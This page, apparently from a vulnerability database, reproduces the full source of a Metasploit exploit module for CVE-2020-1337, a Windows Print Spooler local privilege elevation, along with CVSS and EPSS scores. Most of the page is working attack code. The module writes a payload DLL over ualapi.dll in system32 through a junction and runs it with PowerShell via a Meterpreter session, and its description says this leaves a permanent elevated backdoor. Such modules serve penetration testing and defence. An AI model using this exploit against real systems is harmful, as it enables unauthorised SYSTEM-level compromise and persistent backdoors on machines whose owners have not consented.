Lucene search

K
metasploitPeleg Hadar, Tomer Bar, 404death, sailay1996, bwatters-r7MSF:EXPLOIT-WINDOWS-LOCAL-CVE_2020_1337_PRINTERDEMON-
HistoryNov 20, 2020 - 11:36 p.m.

Microsoft Spooler Local Privilege Elevation Vulnerability

2020-11-2023:36:19
Peleg Hadar, Tomer Bar, 404death, sailay1996, bwatters-r7
www.rapid7.com
76

7.8 High

CVSS3

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

7.2 High

CVSS2

Access Vector

LOCAL

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:L/AC:L/Au:N/C:C/I:C/A:C

0.003 Low

EPSS

Percentile

64.3%

This exploit leverages a file write vulnerability in the print spooler service which will restart if stopped. Because the service cannot be stopped long enough to remove the dll, there is no way to remove the dll once it is loaded by the service. Essentially, on default settings, this module adds a permanent elevated backdoor.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/post/windows/powershell'

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::Common
  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Version
  include Msf::Exploit::EXE
  include Msf::Post::Windows::Powershell

  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Microsoft Spooler Local Privilege Elevation Vulnerability',
        'Description' => %q{
          This exploit leverages a file write vulnerability in the print spooler service
          which will restart if stopped.  Because the service cannot be stopped long
          enough to remove the dll, there is no way to remove the dll once
          it is loaded by the service.  Essentially, on default settings, this module
          adds a permanent elevated backdoor.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Peleg Hadar', # Original discovery
          'Tomer Bar', # Original discovery
          '404death', # PoC
          'sailay1996', # PoC
          'bwatters-r7' # msf module
        ],
        'Platform' => ['win'],
        'SessionTypes' => ['meterpreter'],
        'Targets' => [
          [ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X64 ] } ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2019-11-04',
        'References' => [
          ['CVE', '2020-1337'],
          ['URL', 'https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1337'],
          ['URL', 'https://github.com/sailay1996/cve-2020-1337-poc'],
          ['URL', 'https://voidsec.com/cve-2020-1337-printdemon-is-dead-long-live-printdemon/']
        ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [],
          'SideEffects' => [
            IOC_IN_LOGS,
            ARTIFACTS_ON_DISK
          ]
        },
        'DefaultOptions' => {
          'DisablePayloadHandler' => true
        },
        'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ],
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              powershell_execute
              stdapi_sys_config_getenv
              stdapi_sys_power_exitwindows
            ]
          }
        }
      )
    )

    register_options([
      OptString.new('JUNCTION_PATH',
                    [false, 'Path to use as junction (%TEMP%/%RAND% by default).', nil]),
      OptString.new('DESTINATION_PATH',
                    [false, 'Location of file to overwrite (%WINDIR%\system32\ by default).', nil]),
      OptString.new('DESTINATION_FILE',
                    [false, 'Filename to overwrite (ualapi.dll by default).', nil]),
      OptString.new('PRINTER_NAME',
                    [true, 'Printer Name to use (%RAND% by default).', Rex::Text.rand_text_alpha(5..9).to_s]),
      OptBool.new('RESTART_TARGET',
                  [false, 'Restart the target after exploit (you will lose your session until a second reboot).', false])
    ])
  end

  def cve_2020_1337_privileged_filecopy(destination_file, destination_path, junction_path, printer_name, b64_payload)
    # Read in Generic Script
    script = exploit_data('CVE-2020-1337', 'cve-2020-1337.ps1')
    fail_with(Failure::BadConfig, 'No exploit script found') if script.nil?

    # Replace Values in Generic Script
    vprint_status('Replacing variables')
    junction_filepath = "#{junction_path}\\#{destination_file}"
    # The random string appears to be required when using the psh_exec
    # It may be due to the way we break apart the script?
    # I would not be upset to find the root cause and fix it.
    script.gsub!('JUNCTION_FILEPATH', junction_filepath)
    script.gsub!('PRINTER_NAME', printer_name)
    script.gsub!('JUNCTION_PATH', junction_path)
    script.gsub!('DESTINATION_PATH', destination_path)
    script.gsub!('B64_PAYLOAD_DLL', b64_payload)

    # Run Exploit Script
    print_status("Running Exploit on #{sysinfo['Computer']}")
    begin
      # client.powershell.execute_string(code: script)
      session.powershell.execute_string({ code: script })
    rescue Rex::TimeoutError => e
      elog('Caught timeout.  Exploit may be taking longer or it may have failed.', error: e)
      print_error('Caught timeout.  Exploit may be taking longer or it may have failed.')
    end
  end

  def exploit
    if datastore['DESTINATION_PATH'].nil? || datastore['DESTINATION_PATH'].empty?
      win_dir = session.sys.config.getenv('windir')
      destination_path = "#{win_dir}\\system32"
    else
      destination_path = datastore['DESTINATION_PATH']
    end
    if datastore['DESTINATION_FILE'].nil? || datastore['DESTINATION_FILE'].empty?
      destination_file = 'ualapi.dll'
    else
      destination_file = datastore['DESTINATION_FILE']
    end
    if datastore['JUNCTION_PATH'].nil? || datastore['JUNCTION_PATH'].empty?
      junction_path = "#{session.sys.config.getenv('TEMP')}\\#{Rex::Text.rand_text_alpha(6..15)}"
    else
      junction_path = datastore['JUNCTION_PATH']
    end
    client.core.use('powershell') if !client.ext.aliases.include?('powershell')
    printer_name = datastore['PRINTER_NAME']
    payload_dll = generate_payload_dll

    # Check target
    vprint_status('Checking Target')
    validate_active_host
    validate_payload

    # Run the exploit
    _output = cve_2020_1337_privileged_filecopy(destination_file, destination_path, junction_path, printer_name, Rex::Text.encode_base64(payload_dll))
    sleep(3) # make sure exploit is finished

    # Reboot, if desired
    if datastore['RESTART_TARGET']
      sleep(10)
      vprint_status("Rebooting #{sysinfo['Computer']}")
      begin
        session.sys.power.reboot
      rescue Rex::TimeoutError => e
        elog('Caught timeout.  Exploit may be taking longer or it may have failed.', error: e)
        print_error('Caught timeout.  Exploit may be taking longer or it may have failed.')
      end
    end
  end

  def validate_active_host
    print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
  rescue Rex::Post::Meterpreter::RequestError => e
    elog('Could not connect to session', error: e)
    raise Msf::Exploit::Failed, 'Could not connect to session'
  end

  def validate_payload
    vprint_status("Target Arch = #{sysinfo['Architecture']}")
    vprint_status("Payload Arch = #{payload.arch.first}")
    unless payload.arch.first == sysinfo['Architecture']
      fail_with(Failure::BadConfig, 'Payload arch must match target arch')
    end
  end

  def check
    version = get_version_info
    vprint_status("OS version: #{version}")
    return Exploit::CheckCode::Appears if version.build_number.between?(Msf::WindowsVersion::Win10_InitialRelease, Msf::WindowsVersion::Win10_1909)

    return Exploit::CheckCode::Safe
  end
end

7.8 High

CVSS3

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

7.2 High

CVSS2

Access Vector

LOCAL

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:L/AC:L/Au:N/C:C/I:C/A:C

0.003 Low

EPSS

Percentile

64.3%

Related for MSF:EXPLOIT-WINDOWS-LOCAL-CVE_2020_1337_PRINTERDEMON-